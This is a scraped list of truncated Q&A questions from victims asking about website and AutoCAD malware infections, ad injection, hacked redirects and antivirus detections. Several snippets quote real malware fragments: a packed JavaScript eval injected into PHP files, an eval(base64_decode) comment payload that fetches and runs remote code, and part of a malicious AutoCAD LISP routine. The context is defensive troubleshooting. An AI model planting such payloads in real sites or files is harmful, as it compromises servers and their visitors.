virus

问题 I've got a problem concerning famous on-site ads malware, specifically Ad couponDropDown. I'm aware that usually these ads are created via malware on computer, or as browser Add-on. However, my hard drive and my firefox, both are clean, but ads is still shown on particular website that I created a long time ago. It is inserted between two divs as html tag with random generating class. Site is running on wordpress with iThemes security (formerly better security) - with latest update and none

问题 Is deleting the EXIF data from images using PHP enough to prevent malicious codes from being executed in a server? I want to protect the server against the practices described in this blog post: <?php $img = imagecreatefromjpeg('malicious_codes.jpg'); $w = imagesx($img); $h = imagesy($img); $trans = imagecolortransparent($img); if($trans >= 0) { $rgb = imagecolorsforindex($img, $trans); $oldimg = $img; $img = imagecreatetruecolor($w,$h); $color = imagecolorallocate($img,$rgb['red'],$rgb[

问题 We have the page domain.., and when you search at google.nl to Critical Alignment and click at the homepage of the site you are redirected after a couple of seconds to http://www.venusfactor.com/welcome/. We think the site is hacked, but can not find a redirect or anything. Can someone help? 回答1: Have you checked if the redirect is made where the domain is hosted? Don't know what kind of host you use, but maybe the domain is set to redirect to that page from the host's side. 回答2: A good guide

问题 My friend has a web site on ovh.com.Since a couple of days, the site is flagged as dangerous by google. I had a look in the files (the site only contains only html, css, pjg) and it appears that a new line of code: <script>http://...page.php</script></body> (I do not remember the exact url) has been added in some of the html pages. This is obviously a virus that would be run when the page is displayed. If I delete this line and scan the file once again this is fine. How could this be added to

问题 I have a problem about removing a virus code from my php files. There are more than 1200 php files in my server and every single php file has been infected by a virus. Virus code adding this line to html output here the virus code : <tag5479347351></tag5479347351><script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p

问题 So, I created a python program. Converted to exe using Py2Exe, and tried with PyInstaller and cx_freeze as well. All these trigger the program to be detected as virus by avast, avg, and others on virustotal and on my local machine. I tried changing to a Hello World script to see if the problem is there but the results are exactly the same. My question is, what is triggering this detection? The way in which the .exe is created? If so, are there any other alternatives to Py2exe, Pyinstaller, cx

问题 As it currently stands, this question is not a good fit for our Q&A format. We expect answers to be supported by facts, references, or expertise, but this question will likely solicit debate, arguments, polling, or extended discussion. If you feel that this question can be improved and possibly reopened, visit the help center for guidance. Closed 7 years ago . I need help decoding the following code. Not really sure where to start, myself. Some background: it came via a file called

问题 This question already has answers here : How to get rid of eval-base64_decode like PHP virus files? (7 answers) Closed 3 years ago . I'm using a wordpress blog today i got a comment like this . <!-- unsafe comment zapped --> eval(base64_decode("JGRhdGEgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tL3dvcmRwcmVzcy1jb3JlL3VwZGF0ZS1mcmFtZXdvcmsudHh0Iik7ZXZhbCgkZGF0YSk7")); --><!--/mfunc--> When i've decoded this comment using decoder i got $data = file_get_contents("https://s3

问题 I'm currently using the following code to scan files that have been uploaded as part of an application form: $safe_path = escapeshellarg($dir . $file); $command = '/usr/bin/clamscan --stdout ' . $safe_path; $out = ''; $int = -1; exec($command, $out, $int); if ($int == 0) { // all good; } else { // VIRUS!; } It works, but is slow. Anyone got any suggestions that would a). speed things up and b). improve the script generally (for instance, I'm not entirely clear on the benefits of exec() vs

问题 My firm has been hit by an AutoCAD virus that is deleting and replacing our acaddoc.lsp with the routine below. I'm an architect and not exactly sure what this is doing by the repetitive "find" and "deletes". Questions What is this replacing the files with (currently searching for acadapq ) ? Who writes a virus for AutoCAD?!?! Has anyone seen this before? the CAD forums aren't very helpful. (setq wold_cmd (getvar "cmdecho")) (setvar "cmdecho" 0) (setq bb 2) (setq dpath (getvar "dwgprefix"))